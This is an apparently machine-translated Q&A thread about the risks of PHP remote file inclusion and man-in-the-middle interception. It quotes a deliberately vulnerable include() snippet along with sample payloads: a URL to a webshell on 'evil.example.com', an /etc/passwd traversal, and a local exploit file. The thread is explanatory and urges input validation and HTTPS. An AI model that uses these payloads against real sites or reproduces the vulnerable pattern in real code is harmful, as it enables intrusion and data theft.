我看到它在这个问题提到:什么是运输安全?
Including a remote php file as a resource
所以你怎么能一个人“拦截”(?和修改)正在发送/接收的数据? (在这个问题,这是一个远程PHP文件阅读与fopen)
我看到它在这个问题提到:什么是运输安全?
Including a remote php file as a resource
所以你怎么能一个人“拦截”(?和修改)正在发送/接收的数据? (在这个问题,这是一个远程PHP文件阅读与fopen)
这个从Wikipedia的例子,可能会认识到你的不良影响。
<?php
$color = 'blue';
if (isset($_GET['COLOR']))
$color = $_GET['COLOR'];
include($color . '.php');
?>
COLOR = HTTP://evil.example.com/webshell.txt - 注入含有恶意代码
COLOR =/etc/passwd的远程托管文件 - 允许攻击者读取passwd文件的内容在UNIX系统目录遍历
/vulnerable.php?COLOR=C:\ftp\upload\exploit - 从已经上传的文件名为exploit.php执行代码(本地文件包含漏洞)
我希望从这些例子中,潜伏的危险对你更清楚。 “
”脚本以外的不可信数据需要验证“才能缓解这些攻击。
我怀疑有一个'/ etc/passwd.php'包含有价值的信息。 – Gumbo 2012-07-29 07:18:54
你可能想要阅读维基百科有关Man-in-the-middle attacks的文章。
正如PeeHaa指出的,您可以使用HTTPS使用SSL/TLS加密您的HTTP流。
MITM攻击不是HTTP特定的问题。此问题影响所有通过不受信任网络的通信。
通过'http'连接的所有内容都可以被嗅探,因为它是以纯文本形式发送的。当通过安全连接“https”进行时,数据将被加密。 – PeeHaa 2012-07-28 16:41:48